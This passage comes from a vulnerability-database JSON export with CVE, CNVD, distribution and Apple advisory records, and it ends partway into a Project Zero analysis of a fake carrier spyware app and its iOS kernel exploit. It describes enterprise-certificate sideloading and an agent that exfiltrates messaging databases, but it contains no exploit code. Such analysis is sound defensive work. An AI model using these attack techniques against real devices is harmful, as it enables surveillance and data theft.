"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:5.2.360:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:39", "description": "Windows LSA Spoofing Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-36942", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2022-04-01T13:10:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36942", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36942", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}], "cnvd": [{"lastseen": "2022-11-04T13:19:26", "description": "Google Android is a Linux-based open source operating system from Google, Inc. An elevation-of-privilege vulnerability exists in Google Android due to a code logic error in kbase_jd_user_buf_pin_pages in mali_kbase_mem.c. error. 
An attacker could exploit this vulnerability to elevate local privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-23T00:00:00", "type": "cnvd", "title": "Google Android Elevation of Privilege Vulnerability (CNVD-2022-22949)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-28T00:00:00", "id": "CNVD-2022-22949", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-22949", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:05:31", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, 
"impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "alpinelinux", "title": "CVE-2021-21195", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-06-01T20:25:00", "id": "ALPINE:CVE-2021-21195", "href": "https://security.alpinelinux.org/vuln/CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:06:14", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "alpinelinux", "title": "CVE-2022-22620", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "ALPINE:CVE-2022-22620", "href": "https://security.alpinelinux.org/vuln/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:32", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": 
"2021-06-15T22:15:00", "type": "alpinelinux", "title": "CVE-2021-30551", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T20:02:00", "id": "ALPINE:CVE-2021-30551", "href": "https://security.alpinelinux.org/vuln/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-05-27T15:12:16", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "debiancve", "title": "CVE-2021-21195", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-04-09T22:15:00", "id": "DEBIANCVE:CVE-2021-21195", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:12:16", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "debiancve", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-15T22:15:00", "id": "DEBIANCVE:CVE-2021-30551", "href": "https://security-tracker.debian.org/tracker/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-09T02:50:58", "description": "A use after free issue was addressed with improved memory management. 
This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {}, "published": "2022-03-18T18:15:00", "type": "debiancve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T18:15:00", "id": "DEBIANCVE:CVE-2022-22620", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22620", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-14T17:47:15", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], 
"modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5128", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2023-06-28T22:04:41", "description": "# About the security content of Safari 15.3\n\nThis document describes the security content of Safari 15.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Safari 15.3*\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur and macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\n\n\n* After installing this update, the build number for Safari 15.3 is 16612.4.9.1.8 on macOS Big Sur and 15612.4.9.1.8 on macOS Catalina.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: February 10, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of Safari 15.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:02740BCB30C345C4CD19795FBD8FD739", "href": "https://support.apple.com/kb/HT213091", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-25T06:04:56", "description": "# About the security content of macOS Monterey 12.2.1\n\nThis document describes the security content of macOS Monterey 12.2.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Monterey 12.2.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: February 10, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.2.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:EF619761E522E15BAB653ACD81383CBF", "href": "https://support.apple.com/kb/HT213092", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-25T06:05:02", "description": "# About the security content of iOS 15.3.1 and iPadOS 15.3.1\n\nThis document describes the security content of iOS 15.3.1 and iPadOS 15.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 15.3.1 and iPadOS 15.3.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: February 10, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of iOS 15.3.1 and iPadOS 15.3.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:52E627AE8868F50352A397AD32DB5373", "href": "https://support.apple.com/kb/HT213093", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2023-05-28T02:00:37", "description": "Posted by Ian Beer, Google Project Zero\n\n \n\n\nNOTE: This issue, CVE-2021-30983, was fixed in iOS 15.2 in December 2021.\n\n \n\n\nTowards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with 
me:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioBjlvs-GjJW9ZocxERk7cU6J-bBcWIjauCAzuI6QoMvdQENbSjF6elAZ0yUpLbHfTmOzfdKWBhB_FFR8X9UF1yMqN9XSMmJSUDZ_uVX_zctpmYMaD0G6V7bi68tdJ2C-e3eyM715_cTywzOWAgSbPyazbNtMv65p0lWewhacxCox_vrztKXdRZdjB/s1874/Screenshot%202022-06-22%20at%2016.52.33.png>)\n\nApp splash screen showing the Vodafone carrier logo and the text \"My Vodafone\" (not the legitimate Vodafone app)\n\n \n \n\n\nAlthough this looks like the real [My Vodafone carrier app](<https://apps.apple.com/gb/app/my-vodafone/id370901726>) available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.\n\n \n\n\nThis sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple [Enterprise developer program](<https://developer.apple.com/programs/enterprise/>). This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push \"trusted apps\" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.\n\n \n\n\nIn collaboration with Project Zero, [TAG has published an additional post with more details around the targeting and the actor](<https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/>). 
The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.\n\n## App structure\n\nThe app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.\n\n \n\n\nAgent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.\n\n \n\n\nSix privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.\n\n \n\n\nThis blog post is the story of the last exploit and the month-long journey to understand it.\n\n## Something's missing? Or am I missing something?\n\nAlthough all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.\n\n \n\n\nThe sixth exploit didn't have anything like that.\n\n \n\n\nPerhaps it could be triggering a kernel logic bug like Linus Henze's [Fugu14](<https://github.com/LinusHenze/Fugu14>) exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. 
It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.\n\n \n\n\nIt contained log messages like:\n\n \n\n\nprintf(\"Failed to prepare fake vtable: 0x%08x\", ret);\n\n \n\n\nwhich seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.\n\n \n\n\nShortly after that was this log message:\n\n \n\n\nprintf(\"Waiting for R/W primitives...\");\n\n \n\n\nWhy would you need to wait?\n\n \n\n\nThen shortly after that:\n\n \n\n\nprintf(\"Memory read/write and callfunc primitives ready!\");\n\n \n\n\nUp to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:\n\n \n\n\nprintf(\"Unexpected data read from DCP: 0x%08x\", v49);\n\n## DCP?\n\nIn October 2021 Adam Donenfeld tweeted this:\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgizH1ivW5VjBBB2oIDHbvRvevtn3SaYgaWlwf_F_bWSAb9b9kMrycHwATVj_tyHb22sjTc9jJmwQTc-ehvzmruznZtyWToUNiEfyif6nl3latUr3STT8P0YSL0MgxB8_t-CjNLdHITK0kpCcuYPJhFN7zuOX6s1DqOQVQxthrazNfK0ktsvn4Na1hl/s1988/Screenshot%202022-06-22%20at%2016.52.56.png>)\n\nDCP is the \"Display Co-Processor\" which ships with iPhone 12 and above and all M1 Macs.\n\n \n\n\nThere's little public information about the DCP; the most comprehensive comes from the [Asahi linux project](<https://asahilinux.org/>) which is porting linux to M1 Macs. In their [August 2021](<https://asahilinux.org/2021/08/progress-report-august-2021/>) and [September 2021](<https://asahilinux.org/2021/10/progress-report-september-2021/>) updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by [@alyssarzg](<https://twitter.com/alyssarzg>). 
Asahi describe the DCP like this:\n\n \n\n\nOn most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary\u2026 they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU! \n\n<https://asahilinux.org/2021/08/progress-report-august-2021/>\n\n \n\n\nThe Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.\n\n## Setting the stage\n\nBefore diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?\n\n \n\n\nYears ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. 
